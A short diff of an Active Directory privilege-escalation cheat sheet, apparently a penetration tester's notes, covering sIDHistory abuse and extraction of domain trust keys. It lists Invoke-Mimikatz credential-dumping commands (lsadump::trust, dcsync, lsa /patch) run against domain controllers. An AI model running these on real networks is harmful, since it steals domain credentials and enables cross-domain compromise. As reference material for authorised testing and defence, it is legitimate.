galminyana/CheatSheets/AD/AD_PrivilegesEscalation.md

 # When a user's domain is changed, they get a new SID and the old SID is added to `sIDHistory`
 # AD permissions required.
 Get a cmd on a DA using rubeus or mimikatz

-# Get Domain Trust Key in any of following ways
+# Get Domain Trust Key in any of following ways.
+Need DA on DC
 C:> Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName <dc-host>
 C:> Invoke-Mimikatz -Command '"lsadump::dcsync /user:<domain>\<parent-dc>$
 C:> Invoke-Mimikatz -Command '"lsadump::lsa /patch"'